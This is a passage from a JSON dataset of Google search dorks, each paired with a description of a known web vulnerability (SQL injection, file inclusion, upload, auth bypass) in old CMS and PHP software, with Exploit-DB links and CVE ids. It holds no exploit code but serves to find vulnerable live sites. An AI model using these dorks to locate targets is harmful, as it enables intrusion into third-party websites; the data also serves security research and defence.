https://www.exploit-db.com/exploits/7438"}, {"dork": "allinurl:\"/questcms/\"", "description": "QuestCMS (main.php) Remote File Include Vulnerability: https://www.exploit-db.com/exploits/2137"}, {"dork": "inurl:com_eQuotes", "description": "Joomla Component equotes 0.9.4 Remote SQL injection Vulnerability - CVE: 2008-2628: https://www.exploit-db.com/exploits/5723"}, {"dork": "\"Powered by Xplode CMS\"", "description": "Xplode CMS (wrap_script) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/8373"}, {"dork": "Powered by Jewelry Cart Software", "description": "Jewelry Cart Software (product.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11826"}, {"dork": "\"Dise\u00f1o Web Hernest Consulting S.L.\"", "description": "Administrador de Contenidos Admin Login Bypass vulnerability: https://www.exploit-db.com/exploits/12527"}, {"dork": "inurl:com_cpg", "description": "Mambo CopperminePhotoGalery Component Remote Include Vulnerability - CVE: 2006-4321: https://www.exploit-db.com/exploits/2196"}, {"dork": "inurl:ratelink.php?lnkid=", "description": "Link Trader (lnkid) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10834"}, {"dork": "\"CNStats 2.9\"", "description": "CNStats 2.9 (who_r.php bj) Remote File Inclusion Vulnerability - CVE: 2007-2086: https://www.exploit-db.com/exploits/3741"}, {"dork": "\"Browse with Interactive Map\"", "description": "PHP Real Estate (fullnews.php id) Remote SQL Injection Vulnerability - CVE: 2007-6462: https://www.exploit-db.com/exploits/4737"}, {"dork": "intext:\"Powered By Azaronline.com\"", "description": "Azaronline Design SQL Injection Vulnerability: https://www.exploit-db.com/exploits/15391"}, {"dork": "Powered by ephpscripts", "description": "E-Shop Shopping Cart Script (search_results.php) SQL Injection Vuln - CVE: 2008-5838: https://www.exploit-db.com/exploits/6398"}, {"dork": "\"powered by Blog System\"", "description": "Blog System 1.x (note) SQL Injection Vuln - CVE: 2010-0458: https://www.exploit-db.com/exploits/11216"}, {"dork": "\"Powered by DWdirectory\"", "description": "DWdirectory 2.1 Remote SQL Injection Vulnerability - CVE: 2007-6392: https://www.exploit-db.com/exploits/4708"}, {"dork": "\"2005 www.frank-karau.de\" | \"2006 www.frank-karau.de\"", "description": "GL-SH Deaf Forum 6.4.4 Local File Inclusion Vulnerabilities - CVE: 2007-3535: https://www.exploit-db.com/exploits/4124"}, {"dork": "inurl:jgs_treffen.php", "description": "Woltlab Burning Board Addon JGS-Treffen SQL Injection Vulnerability - CVE: 2008-1640: https://www.exploit-db.com/exploits/5329"}, {"dork": "\"Powered by SoftbizScripts\" inurl:\"searchresult.php?sbcat_id=\"", "description": "Softbiz Recipes Portal Script Remote SQL Injection Vulnerability - CVE: 2007-5449: https://www.exploit-db.com/exploits/4527"}, {"dork": "Powered by SNETWORKS PHP CLASSIFIEDS", "description": "SNETWORKS PHP CLASSIFIEDS 5.0 Remote File Inclusion Vulnerability - CVE: 2008-0137: https://www.exploit-db.com/exploits/4838"}, {"dork": "inurl:Editor/assetmanager/assetmanager.asp", "description": "Asset Manager Remote File upload Vulnerability: https://www.exploit-db.com/exploits/12693"}, {"dork": "inurl:makaledetay.asp?id=", "description": "Mayasan Portal v2.0 (makaledetay.asp) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14420"}, {"dork": "inurl: Powered by Traidnt UP Version 1.0.", "description": "Traidnt UP Version 1.0 Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/8006"}, {"dork": "inurl:\"com_linkr\"", "description": "Joomla Component com_linkr - Local File Inclusion: https://www.exploit-db.com/exploits/11756"}, {"dork": "inurl:\"com_janews\"", "description": "Joomla Component com_janews - Local File Inclusion - CVE: 2010-1219: https://www.exploit-db.com/exploits/11757"}, {"dork": "inurl:\"com_sectionex\"", "description": "Joomla Component com_sectionex - Local File Inclusion: https://www.exploit-db.com/exploits/11759"}, {"dork": "inurl:\"com_rokdownloads\"", "description": "Joomla Component com_rokdownloads - Local File Inclusion - CVE: 2010-1056: https://www.exploit-db.com/exploits/11760"}, {"dork": "inurl:\"com_ganalytics\"", "description": "Joomla Component com_ganalytics - Local File Inclusion: https://www.exploit-db.com/exploits/11758"}, {"dork": "inurl:/phpfootball/", "description": "PHPFootball 1.6 (show.php) Remote Database Disclosure Vulnerability - CVE: 2007-0638: https://www.exploit-db.com/exploits/3226"}, {"dork": "\"Search Adult Directory:\"", "description": "Adult Directory (cat_id) Remote SQL Injection Vulnerability - CVE: 2007-4056: https://www.exploit-db.com/exploits/4238"}, {"dork": "inurl:forum_answer.php?que_id", "description": "AlstraSoft AskMe Pro 2.1 (profile.php?id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14986"}, {"dork": "allinurl:index.php?act=publ", "description": "Qwerty CMS (id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/8104"}, {"dork": "inurl:\"com_cartweberp\"", "description": "Joomla Component com_cartweberp LFI Vulnerability - CVE: 2010-0982: https://www.exploit-db.com/exploits/10942"}, {"dork": "\"PHPAuction GPL Enhanced V2.51 by AuctionCode.com\"", "description": "Auction_Software Script Admin Login Bypass vulnerability: https://www.exploit-db.com/exploits/14247"}, {"dork": "inurl:com_doqment", "description": "Joomla Component com_doqment (cid) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10965"}, {"dork": "intext:PHPhotoalbum v0.5", "description": "PHPhotoalbum 0.5 Multiple Remote SQL Injection Vulnerabilities - CVE: 2008-2501: https://www.exploit-db.com/exploits/5683"}, {"dork": "\"Powered by OnePound\"", "description": "onepound shop 1.x products.php SQL Injection Vulnerability: https://www.exploit-db.com/exploits/9138"}, {"dork": "\"Powered By : Yamamah Version 1.00\"", "description": "Yamamah Photo Gallery 1.00 (download.php) Local File Disclosure Vulnerability - CVE: 2010-2334: https://www.exploit-db.com/exploits/13856"}, {"dork": "\"powered by SnoGrafx\"", "description": "SnoGrafx (cat.php?cat) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14523"}, {"dork": "allinurl:\"xGb.php\"", "description": "xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability - CVE: 2007-4637: https://www.exploit-db.com/exploits/4336"}, {"dork": "\"Powered by ForumApp\"", "description": "ForumApp 3.3 Remote Database Disclosure Vulnerability - CVE: 2008-6147: https://www.exploit-db.com/exploits/7599"}, {"dork": "inurl:/component/jeeventcalendar/", "description": "Joomla JE Event Calendar LFI Vulnerability: https://www.exploit-db.com/exploits/14062"}, {"dork": "allinurl: page_id album \"photo\"", "description": "Wordpress Photo album Remote SQL Injection Vulnerability - CVE: 2008-0939: https://www.exploit-db.com/exploits/5135"}, {"dork": "\"Powered by beamospetition 1.0.12\"", "description": "Joomla Component beamospetition 1.0.12 SQL Injection / XSS - CVE: 2009-0378: https://www.exploit-db.com/exploits/7847"}, {"dork": "\"Powered by 68kb\"", "description": "68kb Knowledge Base Script v1.0.0rc2 Search SQL Injection: https://www.exploit-db.com/exploits/11925"}, {"dork": "\"powered by devalcms v1.4.a\"", "description": "devalcms 1.4a XSS / Remote Code Execution - CVE: 2008-6982: https://www.exploit-db.com/exploits/6369"}, {"dork": "inurl:com_webring", "description": "Joomla Webring Component 1.0 Remote Include Vulnerability - CVE: 2006-4129: https://www.exploit-db.com/exploits/2177"}, {"dork": "inurl:hikaye.asp?id=", "description": "Caner Hikaye Script SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14419"}, {"dork": "intext:Design by: runt communications", "description": "runt-communications Design SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12707"}, {"dork": "Copyright Agares Media phpautovideo", "description": "phpAutoVideo CSRF Vulnerability - OSVDB-ID: 62450: https://www.exploit-db.com/exploits/11502"}, {"dork": "\"Powered by DVHome.cn\"", "description": "PHP TopTree BBS 2.0.1a (right_file) Remote File Inclusion Vulnerability - CVE: 2007-2544: https://www.exploit-db.com/exploits/3854"}, {"dork": "\"powered by ExtCalendar v2\"", "description": "com_extcalendar Mambo Component 2.0 Include Vulnerability: https://www.exploit-db.com/exploits/2022"}, {"dork": "\"Search | Invite | Mail | Blog | Forum\"", "description": "Myspace Clone Script (index.php) Remote File Inclusion Vulnerability - CVE: 2007-6057: https://www.exploit-db.com/exploits/4628"}, {"dork": "\"AcmlmBoard v1.A2\"", "description": "AcmlmBoard 1.A2 (pow) Remote SQL Injection Vulnerability - CVE: 2008-5198: https://www.exploit-db.com/exploits/5969"}, {"dork": "inurl:index.php?option=com_mambads", "description": "Mambo Component com_mambads SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11719"}, {"dork": "inurl:\"modules.php?name=My_eGallery\"", "description": "PHP-Nuke My_eGallery 2.7.9 Remote SQL Injection Vulnerability - CVE: 2008-7038: https://www.exploit-db.com/exploits/5203"}, {"dork": "\"Marketplace Version 1.1.1\"", "description": "Joomla Component Marketplace 1.1.1 SQL Injection Vulnerability - CVE: 2008-0689: https://www.exploit-db.com/exploits/5055"}, {"dork": "\"Powered by Ajax Portal 3.0\"", "description": "MyioSoft Ajax Portal 3.0 (Auth Bypass) SQL Injection Vulnerability - CVE: 2008-5653: https://www.exploit-db.com/exploits/7044"}, {"dork": "\"Powered By IP.Board 3.0.0 Beta 5\"", "description": "Invision Power Board 3.0.0b5 Active XSS & Path Disclosure Vulns: https://www.exploit-db.com/exploits/8538"}, {"dork": "\"MunzurSoft Wep Portal W3\"", "description": "MunzurSoft Wep Portal W3 (kat) SQL Injection Vulnerability - CVE: 2008-4573: https://www.exploit-db.com/exploits/6725"}, {"dork": "Powered by Blox CMS from TownNews.com", "description": "Blox CMS SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12729"}, {"dork": "allinurl :\"wp-content/plugins/st_newsletter\"", "description": "Wordpress Plugin st_newsletter Remote SQL Injection Vulnerability - CVE: 2008-0683: https://www.exploit-db.com/exploits/5053"}, {"dork": "\"\u00a9 2008 DevWorx - devworx.somee.com\"", "description": "TermiSBloG V 1.0 SQL Injection(s) Vulnerability: https://www.exploit-db.com/exploits/11081"}, {"dork": "inurl:\"links_showcat.php?\"", "description": "Dlili Script SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11318"}, {"dork": "Powered by SH-News 3.0", "description": "SH-News 3.0 (comments.php id) Remote SQL Injection Vulnerability - CVE: 2007-6391: https://www.exploit-db.com/exploits/4709"}, {"dork": "\"CaLogic Calendars V1.2.2\"", "description": "CaLogic Calendars 1.2.2 (langsel) Remote SQL Injection Vulnerability - CVE: 2008-2444: https://www.exploit-db.com/exploits/5607"}, {"dork": "inurl:\"com_pollxt\"", "description": "pollxt Mambo Component 1.22.07 Remote Include Vulnerability - CVE: 2006-5045: https://www.exploit-db.com/exploits/2029"}, {"dork": "Powered by PHP Links from DeltaScripts", "description": "PHP Links 1.3 (vote.php id) Remote SQL Injection Vulnerability - CVE: 2008-0565: https://www.exploit-db.com/exploits/5021"}, {"dork": "inurl:index.php?option=com_calendario", "description": "Joomla Component com_calendario Blind SQL injection Vulnerability: https://www.exploit-db.com/exploits/10760"}, {"dork": "Powered by PNphpBB2 / Powered por PNphpBB2", "description": "PNphpBB2 1.2g (phpbb_root_path) Remote File Include Vulnerability - CVE: 2006-4968: https://www.exploit-db.com/exploits/2390"}, {"dork": "\"Powered by Nukedit\"", "description": "Nukedit 4.9.8 Remote Database Disclosure Vulnerability - CVE: 2008-5773: https://www.exploit-db.com/exploits/7491"}, {"dork": "Powered by \"vcart 3.3.2\"", "description": "vcart 3.3.2 Multiple Remote File Inclusion Vulnerabilities - CVE: 2008-0287: https://www.exploit-db.com/exploits/4889"}, {"dork": "Powered by SkaLinks", "description": "SkaLinks 1.5 (Auth Bypass) SQL Injection Vulnerability - CVE: 2009-0451: https://www.exploit-db.com/exploits/7932"}, {"dork": "\"G\u00e9n\u00e9r\u00e9 par KDPics v1.18\"", "description": "G\u00e9n\u00e9r\u00e9 par KDPics v1.18 Remote Add Admin: https://www.exploit-db.com/exploits/11455"}, {"dork": "inurl:\"nabopoll/\"", "description": "nabopoll 1.2 (survey.inc.php path) Remote File Include Vulnerability - CVE: 2005-2157: https://www.exploit-db.com/exploits/3315"}, {"dork": "allinurl :\"modules/eblog\"", "description": "eXV2 Module eblog 1.2 (blog_id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5253"}, {"dork": "Powered By DataLife Engine", "description": "DataLife Engine 8.2 dle_config_api Remote File Inclusion Vulnerability - CVE: 2009-3055: https://www.exploit-db.com/exploits/9572"}, {"dork": "\"\u00a9 Sabdrimer CMS\"", "description": "Sabdrimer PRO 2.2.4 (pluginpath) Remote File Include Vulnerability - CVE: 2006-3520: https://www.exploit-db.com/exploits/1996"}, {"dork": "AlstraSoft Web \"ESE\"", "description": "AlstraSoft Web Email Script Enterprise (id) SQL Injection Vuln - CVE: 2008-5751: https://www.exploit-db.com/exploits/7596"}, {"dork": "Powered by Maian Cart v1.1", "description": "Maian Cart 1.1 Insecure Cookie Handling Vulnerability: https://www.exploit-db.com/exploits/6047"}, {"dork": "Thyme 1. \u00c2\u00a9 2006 eXtrovert Software LLC. All rights reserved", "description": "Thyme 1.3 (export_to) Local File Inclusion Vulnerability - CVE: 2009-0535: https://www.exploit-db.com/exploits/8029"}, {"dork": "eXV2 MyAnnonces", "description": "eXV2 Module MyAnnonces (lid) Remote SQL Injection Vulnerability - CVE: 2008-1406: https://www.exploit-db.com/exploits/5252"}, {"dork": "\"BlogMe PHP created by Gamma Scripts\"", "description": "BlogMe PHP (comments.php id) SQL Injection Vulnerability - CVE: 2008-2175: https://www.exploit-db.com/exploits/5533"}, {"dork": "inurl:\"/go/_files/?file=\"", "description": "SOTEeSKLEP 3.5RC9 (file) Remote File Disclosure Vulnerability - CVE: 2007-4369: https://www.exploit-db.com/exploits/4282"}, {"dork": "inurl:\"option=com_camelcitydb2\"", "description": "Joomla CamelcityDB 2.2 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14530"}, {"dork": "Powered by PacerCMS", "description": "PacerCMS 0.6 (last_module) Remote Code Execution Vulnerability - CVE: 2007-5056: https://www.exploit-db.com/exploits/5098"}, {"dork": "inurl:com_expshop", "description": "Joomla Component EXP Shop (catid) SQL Injection Vulnerability - CVE: 2008-2892: https://www.exploit-db.com/exploits/5893"}, {"dork": "intitle:\"ITech Bids\"", "description": "ITechBids 5.0 (bidhistory.php item_id) Remote SQL Injection Vulnerability - CVE: 2008-0692: https://www.exploit-db.com/exploits/5056"}, {"dork": "\"Script r\u00e9alis\u00e9 par BinGo PHP\"", "description": "BinGo News 3.01 (bnrep) Remote File Include Vulnerability - CVE: 2006-4648: https://www.exploit-db.com/exploits/2312"}, {"dork": "Powered by CS-Cart - Shopping Cart Software", "description": "CS-Cart 1.3.3 (classes_dir) Remote File Include Vulnerability - CVE: 2006-2863: https://www.exploit-db.com/exploits/1872"}, {"dork": "inurl:com_colophon", "description": "Mambo Colophon Component 1.2 Remote Inclusion Vulnerability - CVE: 2006-3969: https://www.exploit-db.com/exploits/2085"}, {"dork": "\" Powered by JTL-Shop 2\"", "description": "JTL-Shop 2 (druckansicht.php) SQL Injection Vulnerability - CVE: 2010-0691: https://www.exploit-db.com/exploits/11445"}, {"dork": "\"Powered by PHP Shop from DeltaScripts\"", "description": "DeltaScripts PHP Shop 1.0 (Auth Bypass) SQL Injection Vulnerability - CVE: 2008-5648: https://www.exploit-db.com/exploits/7025"}, {"dork": "\"Powered by sNews \" inurl:index.php?id=", "description": "sNews (index.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14458"}, {"dork": "\"Torbstoff News 4\"", "description": "Torbstoff News 4 (pfad) Remote File Inclusion Vulnerability - CVE: 2006-4045: https://www.exploit-db.com/exploits/2121"}, {"dork": "intext:Powered by MX-System 2.7.3", "description": "MX-System 2.7.3 (index.php page) Remote SQL Injection Vulnerability - CVE: 2008-2477: https://www.exploit-db.com/exploits/5659"}, {"dork": "\"Powered By 4smart\"", "description": "Magician Blog 1.0 (Auth Bypass) SQL injection Vulnerability: https://www.exploit-db.com/exploits/9283"}, {"dork": "intext:\"Powered by Arcade Builder\"", "description": "ArcadeBuilder Game Portal Manager 1.7 Remote SQL Injection Vuln - CVE: 2007-3521: https://www.exploit-db.com/exploits/4133"}, {"dork": "inurl:\"index.php?id_menu=\"", "description": "CMScontrol 7.x File Upload: https://www.exploit-db.com/exploits/11104"}, {"dork": "Powered By Coppermine Photo Gallery v1.2.2b /Powered By Coppermine", "description": "Coppermine Photo Gallery 1.2.2b (Nuke Addon) Include Vulnerability: https://www.exploit-db.com/exploits/2375"}, {"dork": "\u00c2\u00a9 2005-2006 Powered by eSyndiCat Directory Software", "description": "eSyndiCat Directory Software Multiple SQL Injection Vulnerabilities - CVE: 2007-3811: https://www.exploit-db.com/exploits/4183"}, {"dork": "\"powered by Nabernet\"", "description": "Nabernet (articles.php) Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11482"}, {"dork": "\"Powered by VS PANEL 7.5.5\"", "description": "https://www.exploit-db.com/exploits/9171/ - CVE: 2009-3595"}, {"dork": "\"powered by easytrade\"", "description": "easyTrade 2.x (detail.php id) Remote SQL Injection Vulnerability - CVE: 2008-2790: https://www.exploit-db.com/exploits/5840"}, {"dork": "inurl:\"articles.php?topic=\"", "description": "jPORTAL 2.3.1 articles.php Remote SQL Injection Vulnerability - CVE: 2007-5973: https://www.exploit-db.com/exploits/4614"}, {"dork": "inurl:\"classifieds.php?op=detail_adverts\"", "description": "PHP-Fusion Mod classifieds (lid) Remote SQL Injection Vulnerability - CVE: 2008-5197: https://www.exploit-db.com/exploits/5961"}, {"dork": "\"Emefa Guestbook V 3.0\"", "description": "Emefa Guestbook 3.0 Remote Database Disclosure Vulnerability - CVE: 2008-5852: https://www.exploit-db.com/exploits/7534"}, {"dork": "powered by webit! cms", "description": "Webit Cms SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12744"}, {"dork": "\"wow roster version 1.*\"", "description": "WoW Roster 1.70 (/lib/phpbb.php) Remote File Include Vulnerability: https://www.exploit-db.com/exploits/2109"}, {"dork": "inurl:com_DTRegister eventId", "description": "Joomla Component DT Register Remote SQL injection Vulnerability - CVE: 2008-3265: https://www.exploit-db.com/exploits/6086"}, {"dork": "\"wow roster version 1.5.*\"", "description": "WoW Roster 1.5.1 (subdir) Remote File Include Vulnerability - CVE: 2006-3998: https://www.exploit-db.com/exploits/2099"}, {"dork": "Powered by free simple software", "description": "Free Simple Software v1.0 Remote File Inclusion Vulnerability - CVE: 2010-3307: https://www.exploit-db.com/exploits/14672"}, {"dork": "\"TR Newsportal\" brought by TRanx.", "description": "TR Newsportal 0.36tr1 (poll.php) Remote File Inclusion Vulnerability - CVE: 2006-2557: https://www.exploit-db.com/exploits/1789"}, {"dork": "Powered by Minerva 237", "description": "Minerva 2.0.8a Build 237 (phpbb_root_path) File Include Vulnerability - CVE: 2006-3028: https://www.exploit-db.com/exploits/1908"}, {"dork": "\"Powered By W3infotech\"", "description": "W3infotech ( Auth Bypass ) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10222"}, {"dork": "inurl:\"option=com_org\"", "description": "Joomla Component com_org SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11725"}, {"dork": "\"Powered by GameSiteScript\"", "description": "GameSiteScript 3.1 (profile id) Remote SQL Injection Vulnerability - CVE: 2007-3631: https://www.exploit-db.com/exploits/4159"}, {"dork": "Powered by: Con-Imedia", "description": "IMEDIA (index.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12665"}, {"dork": "(c) SriptBux 2008 | Powered By ScriptBux version 2.50 beta 1", "description": "Bux.to Clone Script Insecure Cookie Handling Vulnerability - CVE: 2008-6162: https://www.exploit-db.com/exploits/6652"}, {"dork": "\"powered by twg\"", "description": "TinyWebGallery 1.5 (image) Remote Include Vulnerabilities - CVE: 2006-4166: https://www.exploit-db.com/exploits/2158"}, {"dork": "allinurl:/phpress/", "description": "phpress 0.2.0 (adisplay.php lang) Local File Inclusion Vulnerability: https://www.exploit-db.com/exploits/4382"}, {"dork": "\"Powered by sendcard - an advanced PHP e-card program\" -site:sendcard.org", "description": "Sendcard 3.4.1 (sendcard.php form) Local File Inclusion Vulnerability - CVE: 2007-2471: https://www.exploit-db.com/exploits/3827"}, {"dork": "intext: \"Powered by Marinet\"", "description": "Marinet cms SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12575"}, {"dork": "UPublisher", "description": "UPublisher 1.0 (viewarticle.asp) Remote SQL Injection Vulnerability - CVE: 2006-5888: https://www.exploit-db.com/exploits/2765"}, {"dork": "intitle:\"Answer Builder\" Ask a question", "description": "Expert Advisior (index.php id) Remote SQL Injection Vulnerbility - CVE: 2007-3882: https://www.exploit-db.com/exploits/4189"}, {"dork": "inurl:\"tinybrowser.php?\"", "description": "TinyBrowser Remote File upload Vulnerability: https://www.exploit-db.com/exploits/12692"}, {"dork": "\"Powered by ECShop v2.5.0\"", "description": "ECShop 2.5.0 (order_sn) Remote SQL Injection Vulnerability - CVE: 2009-1622: https://www.exploit-db.com/exploits/8548"}, {"dork": "\"powered by Photo-Graffix Flash Image Gallery\"", "description": "Photo Graffix 3.4 Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/8372"}, {"dork": "\"inc_webblogmanager.asp\"", "description": "DMXReady Registration Manager 1.1 Arbitrary File Upload Vulnerability - CVE: 2009-2238: https://www.exploit-db.com/exploits/8749"}, {"dork": "inurl:tr.php?id=", "description": "Downline Goldmine Category Addon (id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6947"}, {"dork": "inurl:index.php?mod=jeuxflash", "description": "KwsPHP Module jeuxflash (cat) Remote SQL Injection Vulnerability - CVE: 2008-1759: https://www.exploit-db.com/exploits/5352"}, {"dork": "allinurl :\"modules/gallery\"", "description": "XOOPS Module Gallery 0.2.2 (gid) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5241"}, {"dork": "intext:\"Design by MMA Creative\"", "description": "MMA Creative Design SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12706"}, {"dork": "inurl:tr.php?id=", "description": "Downline Goldmine Builder (tr.php id) Remote SQL Injection Vulnerability - CVE: 2008-4178: https://www.exploit-db.com/exploits/6946"}, {"dork": "''com_noticias''", "description": "Joomla Component com_noticias 1.0 SQL Injection Vulnerability - CVE: 2008-0670: https://www.exploit-db.com/exploits/5081"}, {"dork": "\"MobPartner Counter\" \"upload files\"", "description": "MobPartner Counter - Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/11019"}, {"dork": "allinurl: \"modules/glossaires\"", "description": "XOOPS Module Glossario 2.2 (sid) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5216"}, {"dork": "inurl:com_netinvoice", "description": "Joomla Component netinvoice 1.2.0 SP1 SQL Injection Vulnerability - CVE: 2008-3498: https://www.exploit-db.com/exploits/5939"}, {"dork": "inurl:com_beamospetition", "description": "Joomla Component beamospetition Remote SQL Injection Vulnerability - CVE: 2008-3132: https://www.exploit-db.com/exploits/5965"}, {"dork": "\"com_lmo\"", "description": "Joomla LMO Component 1.0b2 Remote Include Vulnerability - CVE: 2006-3970: https://www.exploit-db.com/exploits/2092"}, {"dork": "\"Powered by Clicknet CMS\"", "description": "Clicknet CMS 2.1 (side) Arbitrary File Disclosure Vulnlerability - CVE: 2009-2325: https://www.exploit-db.com/exploits/9037"}, {"dork": "Igloo (interest group glue)", "description": "Igloo 0.1.9 (Wiki.php) Remote File Include Vulnerability - CVE: 2006-2819: https://www.exploit-db.com/exploits/1863"}, {"dork": "inurl:\"com_acstartseite\"", "description": "Joomla Component com_acstartseite Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11479"}, {"dork": "\"Powered by Populum\"", "description": "Populum 2.3 SQL injection vulnerability: https://www.exploit-db.com/exploits/11126"}, {"dork": "\"Powered by PWP Version 1-5-1\" AND inurl:\"/wiki/run.php\"", "description": "PWP Wiki Processor 1-5-1 Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/7740"}, {"dork": "intext:\"Design by BB Media.Org\"", "description": "BBMedia Design's SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12711"}, {"dork": "inurl:\"com_acprojects\"", "description": "Joomla Component com_acprojects Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11480"}, {"dork": "inurl:\"com_acteammember\"", "description": "Joomla Component com_acteammember SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11483"}, {"dork": "Powered by Maian Weblog v4.0", "description": "Maian Weblog 4.0 Insecure Cookie Handling Vulnerability - CVE: 2008-3318: https://www.exploit-db.com/exploits/6064"}, {"dork": "Powered by: Maian Recipe v1.2", "description": "Maian Recipe 1.2 Insecure Cookie Handling Vulnerability - CVE: 2008-3322: https://www.exploit-db.com/exploits/6063"}, {"dork": "Powered by: Maian Search v1.1", "description": "Maian Search 1.1 Insecure Cookie Handling Vulnerability - CVE: 2008-3317: https://www.exploit-db.com/exploits/6066"}, {"dork": "Powered by: Maian Links v3.1", "description": "Maian Links 3.1 Insecure Cookie Handling Vulnerability - CVE: 2008-3319: https://www.exploit-db.com/exploits/6062"}, {"dork": "Powered by: Maian Uploader v4.0", "description": "Maian Uploader 4.0 Insecure Cookie Handling Vulnerability - CVE: 2008-3321: https://www.exploit-db.com/exploits/6065"}, {"dork": "\"Powered By Steamcast \"0.9.75 beta", "description": "Steamcast 0.9.75b Remote Denial of Service: https://www.exploit-db.com/exploits/8429"}, {"dork": "Powered by Maian Guestbook v3.2", "description": "Maian Guestbook 3.2 Insecure Cookie Handling Vulnerability - CVE: 2008-3320: https://www.exploit-db.com/exploits/6061"}, {"dork": "inurl:acrotxt.php wbb", "description": "WBB2-Addon: Acrotxt v1 (show) Remote SQL Injection Vulnerability - CVE: 2007-4581: https://www.exploit-db.com/exploits/4327"}, {"dork": "Designed by:InterTech Co", "description": "InterTech Co 1.0 SQL Injection: https://www.exploit-db.com/exploits/11440"}, {"dork": "allinurl: cid\"modules/classifieds/index.php?pa=Adsview\"", "description": "XOOPS Module classifieds (cid) Remote SQL Injection Vulnerability - CVE: 2008-0873: https://www.exploit-db.com/exploits/5158"}, {"dork": "News powered by ashnews", "description": "ashNews 0.83 (pathtoashnews) Remote File Include Vulnerabilities - CVE: 2003-1292: https://www.exploit-db.com/exploits/1864"}, {"dork": "allinurl: \"modules MyAnnonces index php pa view\"", "description": "RunCMS Module MyAnnonces (cid) SQL Injection Vulnerability - CVE: 2008-0878: https://www.exploit-db.com/exploits/5156"}, {"dork": "\"News Managed by Ditto News\"", "description": "Xtreme/Ditto News 1.0 (post.php) Remote File Include Vulnerability: https://www.exploit-db.com/exploits/1887"}, {"dork": "Coded By WebLOADER", "description": "Webloader v7 - v8 ( vid ) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12647"}, {"dork": "\"Powered by Philboard\" inurl:\"philboard_forum.asp\"", "description": "Philboard 1.14 (philboard_forum.asp) SQL Injection Vulnerability - CVE: 2007-0920: https://www.exploit-db.com/exploits/3295"}, {"dork": "inurl:\"com_jjgallery", "description": "Joomla Component Carousel Flash Image Gallery RFI Vulnerability - CVE: 2007-6027: https://www.exploit-db.com/exploits/4626"}, {"dork": "intext:\"jPORTAL 2\" inurl:\"mailer.php\"", "description": "jPORTAL 2 mailer.php Remote SQL Injection Vulnerability - CVE: 2007-5974: https://www.exploit-db.com/exploits/4611"}, {"dork": "inurl:CuteSoft_Client/CuteEditor", "description": "Cute Editor ASP.NET Remote File Disclosure Vulnerability - CVE: 2009-4665: https://www.exploit-db.com/exploits/8785"}, {"dork": "Actionn\u00c3\u0192\u00c2\u00a9e par smartblog", "description": "Smartblog (index.php tid) Remote SQL Injection Vulnerability - CVE: 2008-2185: https://www.exploit-db.com/exploits/5535"}, {"dork": "inurl:tr.php?id=", "description": "Downline Goldmine newdownlinebuilder (tr.php id) SQL Injection Vuln: https://www.exploit-db.com/exploits/6951"}, {"dork": "inurl:tr.php?id=", "description": "Downline Goldmine paidversion (tr.php id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6950"}, {"dork": "allintext:\"Browse Blogs by Category\"", "description": "Blog System 1.x (index.php news_id) Remote SQL Injection Vulnerability - CVE: 2007-3979: https://www.exploit-db.com/exploits/4206"}, {"dork": "inurl:option=com_mydyngallery", "description": "Joomla Component mydyngallery 1.4.2 (directory) SQL Injection Vuln - CVE: 2008-5957: https://www.exploit-db.com/exploits/7343"}, {"dork": "inurl:index.php?mod=sondages", "description": "KwsPHP 1.0 sondages Module Remote SQL Injection Vulnerability - CVE: 2007-4979: https://www.exploit-db.com/exploits/4422"}, {"dork": "inurl:\"tr1.php?id=\" Forced Matrix", "description": "YourFreeWorld Forced Matrix Script (id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6939"}, {"dork": "allintext:\"SuperCali Event Calendar\"", "description": "SuperCali PHP Event Calendar 0.4.0 SQL Injection Vulnerability - CVE: 2007-3582: https://www.exploit-db.com/exploits/4141"}, {"dork": "inurl:\"com_ckforms\"", "description": "Joomla Component (com_ckforms) Local File Inclusion Vulnerability: https://www.exploit-db.com/exploits/15453"}, {"dork": "inurl:\"com_prayercenter\"", "description": "Joomla Component prayercenter 1.4.9 (id) SQL Injection Vulnerability - CVE: 2008-6429: https://www.exploit-db.com/exploits/5708/"}, {"dork": "ADP Forum 2.0.3 is powered by VzScripts", "description": "Vz (Adp) Forum 2.0.3 Remote Password Disclosure Vulnerablity - CVE: 2006-6891: https://www.exploit-db.com/exploits/3053"}, {"dork": "inurl:\"com_ccnewsletter\"", "description": "Joomla Component com_ccnewsletter LFI Vulnerability - CVE: 2010-0467: https://www.exploit-db.com/exploits/11282"}, {"dork": "inurl:\"add_soft.php\"", "description": "Software Index 1.1 (cid) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5378"}, {"dork": 